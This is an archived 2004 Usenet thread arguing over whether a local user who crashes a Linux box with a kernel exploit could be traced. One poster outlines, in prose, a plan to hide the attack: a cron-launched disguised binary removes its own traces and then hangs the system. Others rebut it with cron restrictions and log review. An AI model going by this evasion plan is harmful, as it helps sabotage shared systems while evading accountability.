Take it from the staff of a five-cat house: A group of cats is a
"conceit." They'd like to be a "pride" but that would fool no one.
--- Morely Dotes in news.admin.net-abuse.email
| |
| Jim Richardson 2004-06-26, 1:50 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Wed, 23 Jun 2004 09:18:59 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Wed, 23 Jun 2004 08:04:19 +0000, Jim Richardson wrote:
>
>
>
> Correct.
>
>
> Okay, you tell me why this example would not work:
>
Now you are changing the goalposts.
Don't you know the difference between exploit, and vulnerability?
The exploit you posted, could easily be tracked.
> Example:
>
> Day one: [June 19th 10:00:02]:
>
> Regular user logs in and schedules cron to load and execute
> /home/UserName/bin/cleanup.exe, on the 24th day of every month at 3:00:00
> hrs.
>
> User logs out at the end of the day normally.
>
> Day two, three and four:
>
> User logs in and out normally.
>
> Day five [ June 24th 03:00:00 ]:
>
> cron loads and executes the malicious /home/UserName/bin/cleanup.exe.
>
> The malicious code just sits idle for an hour or two, then removes the
> cron entry that loaded it, and deletes the file:
> /home/UserName/bin/cleanup.exe.
>
> Then it goes to sleep for about 16 hours or so.
>
> During day five the malicious user logs in and out as they normally do.
>
> At some point after the malicious user has logged out, the malicious code
> which only exists in memory at this point, will choose to actually hang
> the system, stopping all logging and everything else...DEAD.
>
>
> Then you should be able to easily explain how it would be determined who
> was responsible for killing the system in the above example.
>
>
> So the ability to track a malicious user depends on the bad people only
> running the malicious code exactly as published? Wow, that's really
> comforting....NOT.
>
>
> Why are you so uncomfortable working with a detailed specific example?
>
You gave a detailed, specific example, you provided source code. Yet now
you want to back away from that detailed specific example. Why is that?
> If you can explain *clearly* and *reasonably* how you could identify the
> malicious user in the example, I'll gladly modify the exploit code to
> match the example. Then I'll run it on my system and post all the
> logs you want.
>
Stop trying to move the goalposts. Show me the logs I requested from the
first example, we'll go on from there.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA2cWNd90bcYOAWPYRAtvaAJ416Fiwj2QX
viXms8JELS4rOeLTkQCfTfLj
7CGFlGJlQOKi9nut6HeUSOY=
=kKW4
-----END PGP SIGNATURE-----
--
Jim Richardson http://www.eskimo.com/~warlock
Here's to girls and gunpowder!
--Gregory Peck
| |
| T.G.Reaper 2004-06-26, 1:52 pm |
| On Wed, 23 Jun 2004 18:34:10 +0000, Jim Richardson wrote:
> On Wed, 23 Jun 2004 09:18:59 -0700,
> T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
>
> Stop trying to move the goalposts. Show me the logs I requested from the
> first example, we'll go on from there.
So...your ability to track down the user who uses a published exploit to
kill a Linux system is COMPLETELY DEPENDANT on the "bad guy," executing
the exploit code exactly as published with no modifications?
I'm sure that all the worlds hackers/crackers/terrorists will be more than
happy to cooperate with you on that.
Do you have a sign posted somewhere saying:
"No modified exploits allowed"
THIS MEANS YOU
ROTFL.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Peter Köhlmann 2004-06-26, 1:52 pm |
| T.G.Reaper wrote:
> On Wed, 23 Jun 2004 18:34:10 +0000, Jim Richardson wrote:
>
>
>
>
> So...your ability to track down the user who uses a published exploit to
> kill a Linux system is COMPLETELY DEPENDANT on the "bad guy," executing
> the exploit code exactly as published with no modifications?
>
> I'm sure that all the worlds hackers/crackers/terrorists will be more than
> happy to cooperate with you on that.
>
> Do you have a sign posted somewhere saying:
>
> "No modified exploits allowed"
> THIS MEANS YOU
>
> ROTFL.
>
It has to be noticed that TeeGee still fails to supply the requested logs
--
If you had any brains, you'd be dangerous.
| |
| T.G.Reaper 2004-06-26, 1:52 pm |
| On Wed, 23 Jun 2004 20:03:31 +0200, Mart van de Wege wrote:
> "T.G.Reaper" <Reaper@127.0.0.1.Com> writes:
>
> Easy. See my question below.
>
> <snip>
>
> Tell us, oh Master Sysadmin, how do you delete a crontab entry without
> leaving traces? Edits and deletes to user crontabs are logged to
> syslog, and users can't bypass the normal edit/delete process because
> they don't have write/delete access to their crontab in
> /var/spool/cron.
I know, I don't care about the deleted crontab entry. All that shows is
that an entry to run: "/home/UserName/bin/cleanup.exe." was deleted hours
or days before the system crash actually occured. How useful is that going
to appear to be in determining what happened. Remember all the sysadmin
really knows is that the system crashed, s/he might very well just write
it off as a fluke hardware problem, or power glitch. Leaving the malicious
user free to do it again.
> So, maybe your little trick makes tracing the culprit a *little* more
> difficult, but any sysadmin worth his salt will *still* be able to
> find out who crashed his server.
Except that no one can explain exactly how it would be possible.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
|
| T.G.Reaper wrote:
> On Wed, 23 Jun 2004 20:03:31 +0200, Mart van de Wege wrote:
>
>
> I know, I don't care about the deleted crontab entry. All that shows is
> that an entry to run: "/home/UserName/bin/cleanup.exe." was deleted hours
> or days before the system crash actually occured. How useful is that going
> to appear to be in determining what happened.
Never mind a secure system disallows unauthorized users from using crontab.
From the crontab manpage:
"If the allow file exists, then you must be listed therein in order to
be allowed to use this command. If the allow file does not exist but
the deny file does exist, then you must not be listed in the deny file in
order to use this command. If neither of these files exists, then
depending on site-dependent configuration parameters, only the super
user will be allowed to use this command, or all users will be able to
use this command."
On my system you would not be able to USE cron.
> Remember all the sysadmin
> really knows is that the system crashed, s/he might very well just write
> it off as a fluke hardware problem, or power glitch. Leaving the malicious
> user free to do it again.
>
>
>
> Except that no one can explain exactly how it would be possible.
Simce you would not be able to use cron, your method to hide your actions
would not work.
>
>
--
More Mutt nut logic: A person using a Linux embedded device is not a Linux
user!!!
Sorry Mutt nuts, but the only thing different with a Linux embedded device
is the user interface. The user is still using Linux, just with a different
UI.
| |
| T.G.Reaper 2004-06-26, 1:52 pm |
| On Thu, 24 Jun 2004 14:38:56 +0000, Ralph wrote:
> T.G.Reaper wrote:
>
>
> Never mind a secure system disallows unauthorized users from using crontab.
> From the crontab manpage:
>
> If neither of these files exists, then
> depending on site-dependent configuration parameters, only the super
> user will be allowed to use this command, or all users will be able to
> use this command."
>
> On my system you would not be able to USE cron.
Unfortunately YOUR system is NOT the same as every system on the planet.
>
> Simce you would not be able to use cron, your method to hide your actions
> would not work.
Did you happen to see the part that said: "depending on site-dependent
configuration parameters...or all users will be able to use this command."
IOW it's quit possible that a regular user would indeed be able to
add/delete cron entries.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:52 pm |
| On Thu, 24 Jun 2004 16:28:05 +0200, Peter Köhlmann wrote:
> T.G.Reaper wrote:
>
>
> It has to be noticed that TeeGee still fails to supply the requested logs
It should also be noted that NO ONE has explained how the user executing
the malicious code as described in the example could even possibly be
tracked. Including you Peter.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Peter Köhlmann 2004-06-26, 1:52 pm |
| T.G.Reaper wrote:
> On Thu, 24 Jun 2004 16:28:05 +0200, Peter Köhlmann wrote:
>
>
>
> It should also be noted that NO ONE has explained how the user executing
> the malicious code as described in the example could even possibly be
> tracked. Including you Peter.
>
Supply the logs and stop moving goal-posts
--
Microsoft's Guide To System Design:
Form follows malfunction.
| |
| Peter Köhlmann 2004-06-26, 1:52 pm |
| T.G.Reaper wrote:
> On Thu, 24 Jun 2004 14:38:56 +0000, Ralph wrote:
>
>
>
>
> Unfortunately YOUR system is NOT the same as every system on the planet.
>
A system accessible via the net much more stringent measures would be in
place. Certainly not an open crontab
--
Windows was created to keep stupid people away from UNIX."
__--_Tom_Christiansen
| |
| Jim Richardson 2004-06-26, 1:52 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Thu, 24 Jun 2004 07:05:33 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Wed, 23 Jun 2004 18:34:10 +0000, Jim Richardson wrote:
>
>
>
>
> So...your ability to track down the user who uses a published exploit to
> kill a Linux system is COMPLETELY DEPENDANT on the "bad guy," executing
> the exploit code exactly as published with no modifications?
>
> I'm sure that all the worlds hackers/crackers/terrorists will be more than
> happy to cooperate with you on that.
>
> Do you have a sign posted somewhere saying:
>
> "No modified exploits allowed"
> THIS MEANS YOU
>
You made a claim regarding the posted exploit. a claim, which has been
shown to be at least partly in error. (we won't know more, untill you
provide the logs requested, which you have refused to do.) Then you
wanted to move the goalposts, and talk about *other* as yet, unwritten
exploits.
Figures. Moving goalposts seems to be your specialty.
OK, write the exploit, make sure you do it right, and I will compile and
run it on one of the machines here. Making sure that it is running a
vulnerable kernel, then I will see if I can find any evidence pointing
to the user it ran under.
Show me the code. Don't wave your hands and say "someone could write
this to do..." write it, and get back to me.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA2x8ed90bcYOAWPYRAnpiAJ94AsTAaaHV
RRoqIfZXWjADjCvqPACeInDr
1ZyGCD01hmq0IwRRYut8ou0=
=iOjY
-----END PGP SIGNATURE-----
--
Jim Richardson http://www.eskimo.com/~warlock
The race isn't always to the swift, nor the battle to the strong,
But it's the safest way to bet.
| |
| Jim Richardson 2004-06-26, 1:52 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Thu, 24 Jun 2004 08:45:21 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Thu, 24 Jun 2004 16:28:05 +0200, Peter Köhlmann wrote:
>
>
>
> It should also be noted that NO ONE has explained how the user executing
> the malicious code as described in the example could even possibly be
> tracked. Including you Peter.
>
yes we have, several times, you even responded to some of them.
That's when you started moving the goalposts (again)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA2x9hd90bcYOAWPYRAtAwAKCnN00sIuQK
bKI/xBaquaDD3iTLRACgyIEe
VTlxIpqEIrWl7X/NOgppypI=
=fq/U
-----END PGP SIGNATURE-----
--
Jim Richardson http://www.eskimo.com/~warlock
Here's to girls and gunpowder!
--Gregory Peck
| |
| Mart van de Wege 2004-06-26, 1:52 pm |
| "T.G.Reaper" <Reaper@127.0.0.1.Com> writes:
> On Wed, 23 Jun 2004 20:03:31 +0200, Mart van de Wege wrote:
<snip even more[vbcol=seagreen]
>
>
> I know, I don't care about the deleted crontab entry. All that shows is
> that an entry to run: "/home/UserName/bin/cleanup.exe." was deleted hours
> or days before the system crash actually occured. How useful is that going
> to appear to be in determining what happened. Remember all the sysadmin
> really knows is that the system crashed, s/he might very well just write
> it off as a fluke hardware problem, or power glitch. Leaving the malicious
> user free to do it again.
>
>
Uh no. The sysadmin also knows that an unknown binary was run from
that crontab, which should set off several alarm bells.
>
> Except that no one can explain exactly how it would be possible.
I can think of a few involved ways of doing this, but the easiest way
is to simply couple cron privileges to careful monitoring of user
crontabs.
Any sysadmin that does *not* inspect the crontabs when he sees in the
logs that they are altered leaves himself open to all sorts of
nasties, the most common one a user misjudging the system load of his
periodic process and it starting to interfere with the regular running
of the system.
IOW, it is fairly hard to slip an unkown binary in a crontab past a
smart sysadmin.
I did bring this up. I did see you snipped it. Why did you do that?
To reiterate: on my systems, I see you add a crontab entry (I read my
logs daily, and if I were a professional sysadmin, I'd read them
hourly). I see this entry runs an unknown binary. I suspend your cron
privileges immediately and ask an explanation. What do you do?
Remember, as per your example, this is *before* you get a chance to
run your malicious code.
Mart
--
Take it from the staff of a five-cat house: A group of cats is a
"conceit." They'd like to be a "pride" but that would fool no one.
--- Morely Dotes in news.admin.net-abuse.email
| |
| T.G.Reaper 2004-06-26, 1:52 pm |
| On Thu, 24 Jun 2004 19:07:02 +0000, Jim Richardson wrote:
> OK, write the exploit, make sure you do it right, and I will compile and
> run it on one of the machines here. Making sure that it is running a
> vulnerable kernel, then I will see if I can find any evidence pointing
> to the user it ran under.
>
> Show me the code. Don't wave your hands and say "someone could write
> this to do..." write it, and get back to me.
Okay. I'm building a system from scratch due to a dead motherboard
starting this weekend though, so it may be a while before I can get to
it. After that I'll modify the code to match the example I
gave. Provided of course you agree to allow a regular user account
add/delete cron entries.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:53 pm |
| On Thu, 24 Jun 2004 23:57:12 +0200, Mart van de Wege wrote:
> "T.G.Reaper" <Reaper@127.0.0.1.Com> writes:
>
> IOW, it is fairly hard to slip an unkown binary in a crontab past a
> smart sysadmin.
>
> I did bring this up. I did see you snipped it. Why did you do that?
Because it assumes that every Linux server on the planet is run by a smart
sysadmin, that's just not true. According to most everyone you have to
run an anti-virus utility on Windows. If you don't your system
will almost immediately be compromised, infected, blown up, and possessed
by goblins. I know for a fact that this little tidbit of "common
knowledge," is not true in every case. I have three clean stable Windows
systems that have been that way for years, and not one of them runs any
type of anti-virus utility. The point is that my systems are run by a
"smart sysadmin," and thus work just fine without AV utils. That is the
exception rather than the rule though, the same holds true for Linux
sysadmins, not all, or even the majority are "smart sysadmins."
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Lee Wei Shun 2004-06-26, 1:53 pm |
| T.G.Reaper wrote:
<snip>
>
> Okay. I'm building a system from scratch due to a dead motherboard
> starting this weekend though, so it may be a while before I can get to
> it. After that I'll modify the code to match the example I
> gave. Provided of course you agree to allow a regular user account
> add/delete cron entries.
>
Observation:
Funny how everytime trolls are asked to produce evidence, they have strange
hardware failures. IIRC, EF had the same "problem". Remind me not to get HW
from your suppliers.
Or perhaps both of you have access to the BOFH excuse list?
Cheers,
WS
--
Change to leews to mail.
Linux user #61399
The beginning of the
end
| |
|
| T.G.Reaper wrote:
> On Thu, 24 Jun 2004 14:38:56 +0000, Ralph wrote:
>
>
>
>
> Unfortunately YOUR system is NOT the same as every system on the planet.
So? My system is a single user system, If I want to shut down the system I
have an OFF switch. The ONLY place this bug would be an issue would be on a
system were there were multiple users that had access to the command line
and could either:
Upload code and chmod it to make it executable
-or-
had access to a compiler.
For basic shell accounts, a smart admin would not allow for chmod or access
to a compiler. Your little tricks would not work on any multi user system I
control using what I consider BASIC secury best practices.
>
>
> Did you happen to see the part that said: "depending on site-dependent
> configuration parameters...or all users will be able to use this command."
So? /etc/cron.allow and the average user would not. Poof your method is not
possible. Basic security, everything not explicityly allowed is denied.
>
> IOW it's quit possible that a regular user would indeed be able to
> add/delete cron entries.
Not on a system that can prevent it. But the fact remains, on any system I
administer, you would NOT be able to use cron.
>
>
--
More Mutt nut logic: A person using a Linux embedded device is not a Linux
user!!!
Sorry Mutt nuts, but the only thing different with a Linux embedded device
is the user interface. The user is still using Linux, just with a different
UI.
| |
| Jim Richardson 2004-06-26, 1:53 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Thu, 24 Jun 2004 16:14:01 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Thu, 24 Jun 2004 19:07:02 +0000, Jim Richardson wrote:
>
>
>
> Okay. I'm building a system from scratch due to a dead motherboard
> starting this weekend though, so it may be a while before I can get to
> it. After that I'll modify the code to match the example I
> gave. Provided of course you agree to allow a regular user account
> add/delete cron entries.
>
As that user, of course. It will be an interesting experiment.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA2+Zrd90bcYOAWPYRAsRzAJ9R7wh1g4hP
k3zLepcOqYswB585tQCgmTNd
dFufU7kVotABOTlOScsIUYM=
=3Phk
-----END PGP SIGNATURE-----
--
Jim Richardson http://www.eskimo.com/~warlock
Payday came and with it beer.
-- Rudyard Kipling
| |
| T.G.Reaper 2004-06-26, 1:53 pm |
| On Fri, 25 Jun 2004 09:11:15 +0800, Lee Wei Shun wrote:
> Observation:
>
> Funny how everytime trolls are asked to produce evidence, they have strange
> hardware failures.
If you bother to check my previous posts, you will see that I in fact
mentioned the dead motherboard long before this particular thread was even
started.
So what was that about "funny how everytime...."?
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:54 pm |
| On Fri, 25 Jun 2004 03:35:17 +0000, Ralph wrote:
> T.G.Reaper wrote:
>
>
> But the fact remains, on any system I
> administer, you would NOT be able to use cron.
Fine, when YOU administer every Linux system on the planet, get back to me.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Jim Richardson 2004-06-26, 1:54 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Fri, 25 Jun 2004 06:18:34 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Fri, 25 Jun 2004 03:35:17 +0000, Ralph wrote:
>
>
>
> Fine, when YOU administer every Linux system on the planet, get back to me.
>
Funny, coming from the guy who admins a few MS-Windows machines, and
rabbits on about how secure they are, despite the millions of MS-Windows
machines that are anything but...
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA3DwId90bcYOAWPYRAukdAJ9rkhJxPAZl
X2BwZfnD6CFLA6bNhQCg4HnH
qGgF4ATPtc4qlRQFrt27iw0=
=2j/L
-----END PGP SIGNATURE-----
--
Jim Richardson http://www.eskimo.com/~warlock
Linux: The OS people choose without $200,000,000 of persuasion
| |
|
| T.G.Reaper wrote:
> On Fri, 25 Jun 2004 03:35:17 +0000, Ralph wrote:
>
>
>
> Fine, when YOU administer every Linux system on the planet, get back to
> me.
>
Listen, the bug you go on about is LAME. The MS virus thing is 100 times
worse. I can stop you from using your little bug with a couple of
configuration changes, that is IF you ever got onto one of my boxes to
begin with. The likelyhood of the bug being a big problem is virtualy NILL.
Even if I DON'T administer every machine, the current method of Linux
depoyments are such that it would be very unlikely you would ever be
allowed to run code on any machine other than your own desktop. So you
crash your own desktop, BFD. Unless you can show a significant number of
Linux installs were the average user is running code on a production
server, the bug is only a problem for a few. Nothing at all compared to the
impact viruses have on MS users!
--
More Mutt nut logic: A person using a Linux embedded device is not a Linux
user!!!
Sorry Mutt nuts, but the only thing different with a Linux embedded device
is the user interface. The user is still using Linux, just with a different
UI.
|
|
|
|
|